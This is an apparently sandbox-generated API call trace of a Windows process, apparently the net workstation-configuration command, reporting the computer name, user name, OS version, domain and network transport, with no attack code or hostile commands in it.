	[0229.222] GetConsoleOutputCP () returned 0x1b5
	[0229.222] malloc (_Size=0x100) returned 0xcf418
	[0229.222] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x116c, dwLanguageId=0x0, lpBuffer=0xcf418, nSize=0x7f, Arguments=0x0 | out: lpBuffer="COM Send Timeout (msec)") returned 0x17
	[0229.222] GetConsoleOutputCP () returned 0x1b5
	[0229.223] GetConsoleOutputCP () returned 0x1b5
	[0229.223] malloc (_Size=0x100) returned 0xcf520
	[0229.223] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x116d, dwLanguageId=0x0, lpBuffer=0xcf520, nSize=0x7f, Arguments=0x0 | out: lpBuffer="DOS session print time-out (sec)") returned 0x20
	[0229.223] GetConsoleOutputCP () returned 0x1b5
	[0229.223] GetConsoleOutputCP () returned 0x1b5
	[0229.223] malloc (_Size=0x100) returned 0xcf628
	[0229.223] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x116e, dwLanguageId=0x0, lpBuffer=0xcf628, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Maximum error log size (K)") returned 0x1a
	[0229.223] GetConsoleOutputCP () returned 0x1b5
	[0229.223] GetConsoleOutputCP () returned 0x1b5
	[0229.223] malloc (_Size=0x100) returned 0xcf730
	[0229.223] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x116f, dwLanguageId=0x0, lpBuffer=0xcf730, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Maximum cache memory (K)") returned 0x18
	[0229.223] GetConsoleOutputCP () returned 0x1b5
	[0229.223] GetConsoleOutputCP () returned 0x1b5
	[0229.224] malloc (_Size=0x100) returned 0xcf838
	[0229.224] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1170, dwLanguageId=0x0, lpBuffer=0xcf838, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Number of network buffers") returned 0x19
	[0229.224] GetConsoleOutputCP () returned 0x1b5
	[0229.224] GetConsoleOutputCP () returned 0x1b5
	[0229.224] malloc (_Size=0x100) returned 0xcf940
	[0229.224] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1171, dwLanguageId=0x0, lpBuffer=0xcf940, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Number of character buffers") returned 0x1b
	[0229.224] GetConsoleOutputCP () returned 0x1b5
	[0229.224] GetConsoleOutputCP () returned 0x1b5
	[0229.224] malloc (_Size=0x100) returned 0xcfa48
	[0229.224] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1172, dwLanguageId=0x0, lpBuffer=0xcfa48, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Size of network buffers") returned 0x17
	[0229.224] GetConsoleOutputCP () returned 0x1b5
	[0229.224] GetConsoleOutputCP () returned 0x1b5
	[0229.225] malloc (_Size=0x100) returned 0x1a0060
	[0229.225] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1173, dwLanguageId=0x0, lpBuffer=0x1a0060, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Size of character buffers") returned 0x19
	[0229.225] GetConsoleOutputCP () returned 0x1b5
	[0229.225] GetConsoleOutputCP () returned 0x1b5
	[0229.225] malloc (_Size=0x100) returned 0x1a0168
	[0229.225] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1165, dwLanguageId=0x0, lpBuffer=0x1a0168, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Workstation active on") returned 0x15
	[0229.226] GetConsoleOutputCP () returned 0x1b5
	[0229.226] GetConsoleOutputCP () returned 0x1b5
	[0229.226] malloc (_Size=0x100) returned 0x1a0270
	[0229.226] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x10cc, dwLanguageId=0x0, lpBuffer=0x1a0270, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Yes") returned 0x3
	[0229.226] GetConsoleOutputCP () returned 0x1b5
	[0229.226] GetConsoleOutputCP () returned 0x1b5
	[0229.226] malloc (_Size=0x100) returned 0x1a0378
	[0229.226] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x10cd, dwLanguageId=0x0, lpBuffer=0x1a0378, nSize=0x7f, Arguments=0x0 | out: lpBuffer="No") returned 0x2
	[0229.226] GetConsoleOutputCP () returned 0x1b5
	[0229.226] GetConsoleOutputCP () returned 0x1b5
	[0229.226] malloc (_Size=0x100) returned 0x1a0480
	[0229.226] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1186, dwLanguageId=0x0, lpBuffer=0x1a0480, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Windows NT") returned 0xa
	[0229.227] GetConsoleOutputCP () returned 0x1b5
	[0229.227] GetConsoleOutputCP () returned 0x1b5
	[0229.227] malloc (_Size=0x100) returned 0x1a0588
	[0229.227] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1185, dwLanguageId=0x0, lpBuffer=0x1a0588, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Peer Server") returned 0xb
	[0229.227] GetConsoleOutputCP () returned 0x1b5
	[0229.227] GetConsoleOutputCP () returned 0x1b5
	[0229.227] malloc (_Size=0x100) returned 0x1a0690
	[0229.227] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1188, dwLanguageId=0x0, lpBuffer=0x1a0690, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Windows NT Server") returned 0x11
	[0229.228] GetConsoleOutputCP () returned 0x1b5
	[0229.228] GetConsoleOutputCP () returned 0x1b5
	[0229.228] malloc (_Size=0x100) returned 0x1a0798
	[0229.228] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x11ae, dwLanguageId=0x0, lpBuffer=0x1a0798, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Share-level") returned 0xb
	[0229.228] GetConsoleOutputCP () returned 0x1b5
	[0229.228] GetConsoleOutputCP () returned 0x1b5
	[0229.228] malloc (_Size=0x100) returned 0x1a08a0
	[0229.228] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x11af, dwLanguageId=0x0, lpBuffer=0x1a08a0, nSize=0x7f, Arguments=0x0 | out: lpBuffer="User-level") returned 0xa
	[0229.228] GetConsoleOutputCP () returned 0x1b5
	[0229.228] GetConsoleOutputCP () returned 0x1b5
	[0229.228] malloc (_Size=0x100) returned 0x1a09a8
	[0229.228] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x11b2, dwLanguageId=0x0, lpBuffer=0x1a09a8, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Unlimited Server") returned 0x10
	[0229.228] GetConsoleOutputCP () returned 0x1b5
	[0229.229] GetConsoleOutputCP () returned 0x1b5
	[0229.229] malloc (_Size=0x100) returned 0x1a0ab0
	[0229.229] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1176, dwLanguageId=0x0, lpBuffer=0x1a0ab0, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Windows 2002") returned 0xc
	[0229.229] GetConsoleOutputCP () returned 0x1b5
	[0229.229] GetConsoleOutputCP () returned 0x1b5
	[0229.229] _snwprintf_s (in: _DstBuf=0x462880, _DstSizeInWords=0x1000, _MaxCount=0xffffffff, _Format="%-*.*ws" | out: _DstBuf="Computer name                        ") returned 37
	[0229.229] GetConsoleOutputCP () returned 0x1b5
	[0229.230] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="%-*.*ws\\\\%Fws\r\n", _ArgList=0x19f828 | out: _Buffer="Computer name                        \\\\ZGW5TDPU\r\n") returned 49
	[0229.230] GetFileType (hFile=0x15c) returned 0x3
	[0229.230] LocalAlloc (uFlags=0x0, uBytes=0x62) returned 0x2e9330
	[0229.230] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Computer name                        \\\\ZGW5TDPU\r\n", cchWideChar=49, lpMultiByteStr=0x2e9330, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Computer name                        \\\\ZGW5TDPU\r\n", lpUsedDefaultChar=0x0) returned 49
	[0229.230] WriteFile (in: hFile=0x15c, lpBuffer=0x2e9330*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x19f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2e9330*, lpNumberOfBytesWritten=0x19f7fc*=0x31, lpOverlapped=0x0) returned 1
	[0229.230] LocalFree (hMem=0x2e9330) returned 0x0
	[0229.230] _snwprintf_s (in: _DstBuf=0x462880, _DstSizeInWords=0x1000, _MaxCount=0xffffffff, _Format="%-*.*ws" | out: _DstBuf="Full Computer name                   ") returned 37
	[0229.230] GetConsoleOutputCP () returned 0x1b5
	[0229.230] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="%-*.*ws%Fws\r\n", _ArgList=0x19f828 | out: _Buffer="Full Computer name                   ZgW5tdPu\r\n") returned 47
	[0229.230] GetFileType (hFile=0x15c) returned 0x3
	[0229.230] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2e9330
	[0229.231] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Full Computer name                   ZgW5tdPu\r\n", cchWideChar=47, lpMultiByteStr=0x2e9330, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Full Computer name                   ZgW5tdPu\r\n\r\n", lpUsedDefaultChar=0x0) returned 47
	[0229.231] WriteFile (in: hFile=0x15c, lpBuffer=0x2e9330*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x19f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2e9330*, lpNumberOfBytesWritten=0x19f7fc*=0x2f, lpOverlapped=0x0) returned 1
	[0229.231] LocalFree (hMem=0x2e9330) returned 0x0
	[0229.231] _snwprintf_s (in: _DstBuf=0x462880, _DstSizeInWords=0x1000, _MaxCount=0xffffffff, _Format="%-*.*ws" | out: _DstBuf="User name                            ") returned 37
	[0229.231] GetConsoleOutputCP () returned 0x1b5
	[0229.231] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="%-*.*ws%Fws\r\n", _ArgList=0x19f828 | out: _Buffer="User name                            2XC7u663GxWc\r\n") returned 51
	[0229.231] GetFileType (hFile=0x15c) returned 0x3
	[0229.231] LocalAlloc (uFlags=0x0, uBytes=0x66) returned 0x2e9330
	[0229.231] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="User name                            2XC7u663GxWc\r\n", cchWideChar=51, lpMultiByteStr=0x2e9330, cbMultiByte=102, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="User name                            2XC7u663GxWc\r\n", lpUsedDefaultChar=0x0) returned 51
	[0229.231] WriteFile (in: hFile=0x15c, lpBuffer=0x2e9330*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x19f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2e9330*, lpNumberOfBytesWritten=0x19f7fc*=0x33, lpOverlapped=0x0) returned 1
	[0229.231] LocalFree (hMem=0x2e9330) returned 0x0
	[0229.231] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x19f830 | out: _Buffer="\r\n") returned 2
	[0229.231] GetFileType (hFile=0x15c) returned 0x3
	[0229.231] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e84c0
	[0229.231] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e84c0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2
	[0229.231] WriteFile (in: hFile=0x15c, lpBuffer=0x2e84c0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19f804, lpOverlapped=0x0 | out: lpBuffer=0x2e84c0*, lpNumberOfBytesWritten=0x19f804*=0x2, lpOverlapped=0x0) returned 1
	[0229.232] LocalFree (hMem=0x2e84c0) returned 0x0
	[0229.232] _snwprintf_s (in: _DstBuf=0x462880, _DstSizeInWords=0x1000, _MaxCount=0xffffffff, _Format="%-*.*ws" | out: _DstBuf="Workstation active on                ") returned 37
	[0229.232] GetConsoleOutputCP () returned 0x1b5
	[0229.232] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="%-*.*ws\r\n", _ArgList=0x19f82c | out: _Buffer="Workstation active on                \r\n") returned 39
	[0229.232] GetFileType (hFile=0x15c) returned 0x3
	[0229.232] LocalAlloc (uFlags=0x0, uBytes=0x4e) returned 0x2e9330
	[0229.232] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Workstation active on                \r\n", cchWideChar=39, lpMultiByteStr=0x2e9330, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workstation active on                \r\nC7u663GxWc\r\n", lpUsedDefaultChar=0x0) returned 39
	[0229.232] WriteFile (in: hFile=0x15c, lpBuffer=0x2e9330*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x19f800, lpOverlapped=0x0 | out: lpBuffer=0x2e9330*, lpNumberOfBytesWritten=0x19f800*=0x27, lpOverlapped=0x0) returned 1
	[0229.232] LocalFree (hMem=0x2e9330) returned 0x0
	[0229.232] NetWkstaTransportEnum (in: servername=0x0, level=0x0, bufptr=0x19f824, prefmaxlen=0xffffffff, entriesread=0x19f834, totalentries=0x19f820, resumehandle=0x0 | out: bufptr=0x19f824, entriesread=0x19f834, totalentries=0x19f820, resumehandle=0x0) returned 0x0
	[0229.234] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\x09%s (%s)\r\n", _ArgList=0x19f7fc | out: _Buffer="\x09NetBT_Tcpip_{D303B40D-CBB0-4CD4-933A-0697F06EA7C1} (000A916E33D9)\r\n") returned 68
	[0229.234] GetFileType (hFile=0x15c) returned 0x3
	[0229.234] LocalAlloc (uFlags=0x0, uBytes=0x88) returned 0x2ea8a8
	[0229.234] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\x09NetBT_Tcpip_{D303B40D-CBB0-4CD4-933A-0697F06EA7C1} (000A916E33D9)\r\n", cchWideChar=68, lpMultiByteStr=0x2ea8a8, cbMultiByte=136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x09NetBT_Tcpip_{D303B40D-CBB0-4CD4-933A-0697F06EA7C1} (000A916E33D9)\r\nI", lpUsedDefaultChar=0x0) returned 68
	[0229.234] WriteFile (in: hFile=0x15c, lpBuffer=0x2ea8a8*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x19f7d0, lpOverlapped=0x0 | out: lpBuffer=0x2ea8a8*, lpNumberOfBytesWritten=0x19f7d0*=0x44, lpOverlapped=0x0) returned 1
	[0229.234] LocalFree (hMem=0x2ea8a8) returned 0x0
	[0229.234] NetApiBufferFree (Buffer=0x2e9330) returned 0x0
	[0229.234] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x19f80c | out: _Buffer="\r\n") returned 2
	[0229.234] GetFileType (hFile=0x15c) returned 0x3
	[0229.234] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e84c0
	[0229.234] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e84c0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2
	[0229.234] WriteFile (in: hFile=0x15c, lpBuffer=0x2e84c0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19f7e0, lpOverlapped=0x0 | out: lpBuffer=0x2e84c0*, lpNumberOfBytesWritten=0x19f7e0*=0x2, lpOverlapped=0x0) returned 1
	[0229.234] LocalFree (hMem=0x2e84c0) returned 0x0
	[0229.235] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", phkResult=0x19f828 | out: phkResult=0x19f828*=0xd8) returned 0x0
	[0229.235] RegQueryValueExW (in: hKey=0xd8, lpValueName="ProductName", lpReserved=0x0, lpType=0x19f820, lpData=0x0, lpcbData=0x19f824*=0x0 | out: lpType=0x19f820*=0x1, lpData=0x0, lpcbData=0x19f824*=0x2e) returned 0x0
	[0229.235] NetApiBufferAllocate (in: ByteCount=0x2e, Buffer=0x19f82c | out: Buffer=0x19f82c*=0x2e9330) returned 0x0
	[0229.235] RegQueryValueExW (in: hKey=0xd8, lpValueName="ProductName", lpReserved=0x0, lpType=0x19f820, lpData=0x2e9330, lpcbData=0x19f824*=0x2e | out: lpType=0x19f820*=0x1, lpData="Windows 7 Professional", lpcbData=0x19f824*=0x2e) returned 0x0
	[0229.235] RegCloseKey (hKey=0xd8) returned 0x0
	[0229.235] _snwprintf_s (in: _DstBuf=0x462880, _DstSizeInWords=0x1000, _MaxCount=0xffffffff, _Format="%-*.*ws" | out: _DstBuf="Software version                     ") returned 37
	[0229.235] GetConsoleOutputCP () returned 0x1b5
	[0229.235] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="%-*.*ws%-0.31ws\r\n", _ArgList=0x19f828 | out: _Buffer="Software version                     Windows 7 Professional\r\n") returned 61
	[0229.235] GetFileType (hFile=0x15c) returned 0x3
	[0229.235] LocalAlloc (uFlags=0x0, uBytes=0x7a) returned 0x2e9368
	[0229.236] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Software version                     Windows 7 Professional\r\n", cchWideChar=61, lpMultiByteStr=0x2e9368, cbMultiByte=122, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Software version                     Windows 7 Professional\r\n", lpUsedDefaultChar=0x0) returned 61
	[0229.236] WriteFile (in: hFile=0x15c, lpBuffer=0x2e9368*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x19f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2e9368*, lpNumberOfBytesWritten=0x19f7fc*=0x3d, lpOverlapped=0x0) returned 1
	[0229.236] LocalFree (hMem=0x2e9368) returned 0x0
	[0229.236] NetApiBufferFree (Buffer=0x2e9330) returned 0x0
	[0229.236] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x19f830 | out: _Buffer="\r\n") returned 2
	[0229.236] GetFileType (hFile=0x15c) returned 0x3
	[0229.236] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e84c0
	[0229.236] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e84c0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2
	[0229.236] WriteFile (in: hFile=0x15c, lpBuffer=0x2e84c0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19f804, lpOverlapped=0x0 | out: lpBuffer=0x2e84c0*, lpNumberOfBytesWritten=0x19f804*=0x2, lpOverlapped=0x0) returned 1
	[0229.236] LocalFree (hMem=0x2e84c0) returned 0x0
	[0229.236] _snwprintf_s (in: _DstBuf=0x462880, _DstSizeInWords=0x1000, _MaxCount=0xffffffff, _Format="%-*.*ws" | out: _DstBuf="Workstation domain                   ") returned 37
	[0229.236] GetConsoleOutputCP () returned 0x1b5
	[0229.236] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="%-*.*ws%Fws\r\n", _ArgList=0x19f828 | out: _Buffer="Workstation domain                   WORKGROUP\r\n") returned 48
	[0229.236] GetFileType (hFile=0x15c) returned 0x3
	[0229.236] LocalAlloc (uFlags=0x0, uBytes=0x60) returned 0x2e9330
	[0229.237] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Workstation domain                   WORKGROUP\r\n", cchWideChar=48, lpMultiByteStr=0x2e9330, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workstation domain                   WORKGROUP\r\n\x1b", lpUsedDefaultChar=0x0) returned 48
	[0229.237] WriteFile (in: hFile=0x15c, lpBuffer=0x2e9330*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x19f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2e9330*, lpNumberOfBytesWritten=0x19f7fc*=0x30, lpOverlapped=0x0) returned 1
	[0229.237] LocalFree (hMem=0x2e9330) returned 0x0
	[0229.237] DsRoleFreeMemory () returned 0x0
	[0229.237] _snwprintf_s (in: _DstBuf=0x462880, _DstSizeInWords=0x1000, _MaxCount=0xffffffff, _Format="%-*.*ws" | out: _DstBuf="Logon domain                         ") returned 37
	[0229.237] GetConsoleOutputCP () returned 0x1b5
	[0229.237] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="%-*.*ws%Fws\r\n", _ArgList=0x19f828 | out: _Buffer="Logon domain                         ZGW5TDPU\r\n") returned 47
	[0229.237] GetFileType (hFile=0x15c) returned 0x3
	[0229.237] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2ea318
	[0229.237] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Logon domain                         ZGW5TDPU\r\n", cchWideChar=47, lpMultiByteStr=0x2ea318, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Logon domain                         ZGW5TDPU\r\n", lpUsedDefaultChar=0x0) returned 47
	[0229.237] WriteFile (in: hFile=0x15c, lpBuffer=0x2ea318*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x19f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2ea318*, lpNumberOfBytesWritten=0x19f7fc*=0x2f, lpOverlapped=0x0) returned 1
	[0229.237] LocalFree (hMem=0x2ea318) returned 0x0
	[0229.237] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x19f830 | out: _Buffer="\r\n") returned 2
	[0229.237] GetFileType (hFile=0x15c) returned 0x3
	[0229.238] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e84c0
	[0229.238] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e84c0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2
	[0229.238] WriteFile (in: hFile=0x15c, lpBuffer=0x2e84c0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19f804, lpOverlapped=0x0 | out: lpBuffer=0x2e84c0*, lpNumberOfBytesWritten=0x19f804*=0x2, lpOverlapped=0x0) returned 1
	[0229.238] LocalFree (hMem=0x2e84c0) returned 0x0
	[0229.238] _snwprintf_s (in: _DstBuf=0x462880, _DstSizeInWords=0x1000, _MaxCount=0xffffffff, _Format="%-*.*ws" | out: _DstBuf="COM Open Timeout (sec)               ") returned 37
	[0229.238] GetConsoleOutputCP () returned 0x1b5
	[0229.238] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="%-*.*ws%hu\r\n", _ArgList=0x19f828 | out: _Buffer="COM Open Timeout (sec)               0\r\n") returned 40
	[0229.238] GetFileType (hFile=0x15c) returned 0x3
	[0229.238] LocalAlloc (uFlags=0x0, uBytes=0x50) returned 0x2ea318
	[0229.238] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="COM Open Timeout (sec)               0\r\n", cchWideChar=40, lpMultiByteStr=0x2ea318, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COM Open Timeout (sec)               0\r\n5TDPU\r\n", lpUsedDefaultChar=0x0) returned 40
	[0229.238] WriteFile (in: hFile=0x15c, lpBuffer=0x2ea318*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x19f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2ea318*, lpNumberOfBytesWritten=0x19f7fc*=0x28, lpOverlapped=0x0) returned 1
	[0229.238] LocalFree (hMem=0x2ea318) returned 0x0
	[0229.238] _snwprintf_s (in: _DstBuf=0x462880, _DstSizeInWords=0x1000, _MaxCount=0xffffffff, _Format="%-*.*ws" | out: _DstBuf="COM Send Count (byte)                ") returned 37
	[0229.238] GetConsoleOutputCP () returned 0x1b5
	[0229.239] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="%-*.*ws%hu\r\n", _ArgList=0x19f828 | out: _Buffer="COM Send Count (byte)                16\r\n") returned 41
	[0229.239] GetFileType (hFile=0x15c) returned 0x3
	[0229.239] LocalAlloc (uFlags=0x0, uBytes=0x52) returned 0x2ea318
	[0229.239] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="COM Send Count (byte)                16\r\n", cchWideChar=41, lpMultiByteStr=0x2ea318, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COM Send Count (byte)                16\r\nTDPU\r\n", lpUsedDefaultChar=0x0) returned 41
	[0229.239] WriteFile (in: hFile=0x15c, lpBuffer=0x2ea318*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x19f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2ea318*, lpNumberOfBytesWritten=0x19f7fc*=0x29, lpOverlapped=0x0) returned 1
	[0229.239] LocalFree (hMem=0x2ea318) returned 0x0
	[0229.239] _snwprintf_s (in: _DstBuf=0x462880, _DstSizeInWords=0x1000, _MaxCount=0xffffffff, _Format="%-*.*ws" | out: _DstBuf="COM Send Timeout (msec)              ") returned 37
	[0229.239] GetConsoleOutputCP () returned 0x1b5
	[0229.239] _vsnwprintf_s (in: _Buffer=0x464880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="%-*.*ws%lu\r\n", _ArgList=0x19f828 | out: _Buffer="COM Send Timeout (msec)              250\r\n") returned 42
	[0229.239] GetFileType (hFile=0x15c) returned 0x3
	[0229.239] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x2ea318
	[0229.239] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="COM Send Timeout (msec)              250\r\n", cchWideChar=42, lpMultiByteStr=0x2ea318, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COM Send Timeout (msec)              250\r\nDPU\r\n", lpUsedDefaultChar=0x0) returned 42
	[0229.239] WriteFile (in: hFile=0x15c, lpBuffer=0x2ea318*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x19f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2ea318*, lpNumberOfBytesWritten=0x19f7fc*=0x2a, lpOverlapped=0x0) returned 1
	[0229.240] LocalFree (hMem=0x2ea318) returned 0x0
	[0229.240] NetApiBufferFree (Buffer=0x2e9c98) returned 0x0
	[0229.240] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0xdac, dwLanguageId=0x0, lpBuffer=0x45b338, nSize=0x800, Arguments=0x459dd8 | out: lpBuffer="The command completed successfully.\r\n") returned 0x25
	[0229.241] GetFileType (hFile=0x15c) returned 0x3
	[0229.241] LocalAlloc (uFlags=0x0, uBytes=0x4a) returned 0x2ea318
	[0229.241] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The command completed successfully.\r\n", cchWideChar=37, lpMultiByteStr=0x2ea318, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The command completed successfully.\r\n250\r\nDPU\r\n", lpUsedDefaultChar=0x0) returned 37
	[0229.241] WriteFile (in: hFile=0x15c, lpBuffer=0x2ea318*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x19f7e0, lpOverlapped=0x0 | out: lpBuffer=0x2ea318*, lpNumberOfBytesWritten=0x19f7e0*=0x25, lpOverlapped=0x0) returned 1
	[0229.241] LocalFree (hMem=0x2ea318) returned 0x0
	[0229.241] GetFileType (hFile=0x15c) returned 0x3
	[0229.241] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e84c0
	[0229.241] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e84c0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2
